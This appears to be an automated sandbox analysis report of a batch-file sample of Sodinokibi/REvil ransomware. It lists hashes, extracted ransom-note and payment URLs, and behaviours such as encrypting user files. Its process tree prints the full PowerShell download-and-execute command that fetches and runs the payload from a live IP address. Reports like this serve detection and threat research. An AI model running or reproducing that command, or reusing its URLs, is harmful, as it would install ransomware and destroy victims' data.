Analysis
-
max time kernel
75s -
max time network
44s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
31-08-2020 11:10
Static task
static1
Behavioral task
behavioral1
Sample
14a4a3784dbc627e1c40e41285df29c2.bat
Resource
win7
Behavioral task
behavioral2
Sample
14a4a3784dbc627e1c40e41285df29c2.bat
Resource
win10v200722
General
-
Target
14a4a3784dbc627e1c40e41285df29c2.bat
-
Size
214B
-
MD5
382d73e9001eda598dfc10e833b7742b
-
SHA1
c732b41c5dc34d1b378fb23cc634cc6ee82774fa
-
SHA256
4acb6253945b477cb489a9b8adbe3e5dff9f142c7ec942a0a6d4902ccea3ffd7
-
SHA512
b046949436d9c1f153298971c3140b76f5802be988a2b95dca2f2df6102dfdff7d92f3da0fe6c813a65f2af6abd0a8a2227177f3787252d738e82b2231a121eb
Malware Config
Extracted
http://185.103.242.78/pastes/14a4a3784dbc627e1c40e41285df29c2
Extracted
C:\67wsw-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/AF6D107408866E7D
http://decryptor.cc/AF6D107408866E7D
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 11 1640 powershell.exe -
Modifies extensions of user files 9 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
powershell.exedescription ioc process File renamed C:\Users\Admin\Pictures\FindAssert.tif => \??\c:\users\admin\pictures\FindAssert.tif.67wsw powershell.exe File renamed C:\Users\Admin\Pictures\NewConnect.tiff => \??\c:\users\admin\pictures\NewConnect.tiff.67wsw powershell.exe File renamed C:\Users\Admin\Pictures\RestartSearch.tif => \??\c:\users\admin\pictures\RestartSearch.tif.67wsw powershell.exe File renamed C:\Users\Admin\Pictures\DisconnectResolve.crw => \??\c:\users\admin\pictures\DisconnectResolve.crw.67wsw powershell.exe File renamed C:\Users\Admin\Pictures\PushReceive.crw => \??\c:\users\admin\pictures\PushReceive.crw.67wsw powershell.exe File opened for modification \??\c:\users\admin\pictures\ConvertToWrite.tiff powershell.exe File opened for modification \??\c:\users\admin\pictures\NewConnect.tiff powershell.exe File renamed C:\Users\Admin\Pictures\ConvertToUnblock.tif => \??\c:\users\admin\pictures\ConvertToUnblock.tif.67wsw powershell.exe File renamed C:\Users\Admin\Pictures\ConvertToWrite.tiff => \??\c:\users\admin\pictures\ConvertToWrite.tiff.67wsw powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 5 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\0954u7.bmp" powershell.exe -
Drops file in Program Files directory 37 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\UninstallPublish.wpl powershell.exe File opened for modification \??\c:\program files\UnpublishExit.js powershell.exe File opened for modification \??\c:\program files\ApproveGroup.docx powershell.exe File opened for modification \??\c:\program files\CompareUse.jpg powershell.exe File opened for modification \??\c:\program files\OptimizeSync.DVR powershell.exe File opened for modification \??\c:\program files\StepStop.pps powershell.exe File opened for modification \??\c:\program files\SubmitCompare.xsl powershell.exe File opened for modification \??\c:\program files\WatchUse.avi powershell.exe File opened for modification \??\c:\program files\ConnectDismount.potx powershell.exe File opened for modification \??\c:\program files\DisconnectExpand.xps powershell.exe File opened for modification \??\c:\program files\ExportInitialize.bmp powershell.exe File opened for modification \??\c:\program files\JoinWatch.dwg powershell.exe File opened for modification \??\c:\program files\MountEnable.vb powershell.exe File created \??\c:\program files\67wsw-readme.txt powershell.exe File opened for modification \??\c:\program files\ExportWait.7z powershell.exe File opened for modification \??\c:\program files\MergeInstall.vssm powershell.exe File opened for modification \??\c:\program files\OpenOptimize.asf powershell.exe File opened for modification \??\c:\program files\CheckpointGroup.dotx powershell.exe File opened for modification \??\c:\program files\CompareGet.js powershell.exe File opened for modification \??\c:\program files\ConnectEnable.emf powershell.exe File opened for modification \??\c:\program files\FindRemove.sql powershell.exe File opened for modification \??\c:\program files\UpdateDeny.ADT powershell.exe File opened for modification \??\c:\program files\ClearGrant.xhtml powershell.exe File opened for modification \??\c:\program files\ImportDebug.zip powershell.exe File opened for modification \??\c:\program files\MoveGet.wpl powershell.exe File opened for modification \??\c:\program files\UpdateLimit.pdf powershell.exe File opened for modification \??\c:\program files\PublishRepair.asx powershell.exe File opened for modification \??\c:\program files\SetAdd.mpg powershell.exe File opened for modification \??\c:\program files\SuspendCopy.xla powershell.exe File created \??\c:\program files (x86)\67wsw-readme.txt powershell.exe File opened for modification \??\c:\program files\ExpandUnprotect.gif powershell.exe File opened for modification \??\c:\program files\ExportHide.mp3 powershell.exe File opened for modification \??\c:\program files\OptimizeDebug.tif powershell.exe File opened for modification \??\c:\program files\ResizeUnblock.cr2 powershell.exe File opened for modification \??\c:\program files\ResumeFormat.cfg powershell.exe File opened for modification \??\c:\program files\UnblockCheckpoint.php powershell.exe File opened for modification \??\c:\program files\UnblockNew.pptm powershell.exe -
Drops file in Windows directory 1 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\ServiceProfiles\LocalService\winhttp\cachev3.dat svchost.exe -
Modifies data under HKEY_USERS 6 IoCs
Processes:
svchost.exedescription ioc process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7 svchost.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecisionReason = "1" svchost.exe Set value (data) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecisionTime = e1bd118a987fd601 svchost.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecision = "0" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections svchost.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepid process 1640 powershell.exe 1640 powershell.exe 1640 powershell.exe 1640 powershell.exe 1640 powershell.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
svchost.exepowershell.exevssvc.exedescription pid process Token: SeShutdownPrivilege 420 svchost.exe Token: SeCreatePagefilePrivilege 420 svchost.exe Token: SeDebugPrivilege 1640 powershell.exe Token: SeDebugPrivilege 1640 powershell.exe Token: SeTakeOwnershipPrivilege 1640 powershell.exe Token: SeBackupPrivilege 184 vssvc.exe Token: SeRestorePrivilege 184 vssvc.exe Token: SeAuditPrivilege 184 vssvc.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 3816 wrote to memory of 1640 3816 cmd.exe powershell.exe PID 3816 wrote to memory of 1640 3816 cmd.exe powershell.exe PID 3816 wrote to memory of 1640 3816 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\14a4a3784dbc627e1c40e41285df29c2.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3816 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/14a4a3784dbc627e1c40e41285df29c2');Invoke-ZZXMUDC;Start-Sleep -s 10000"2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1640
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:420
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:184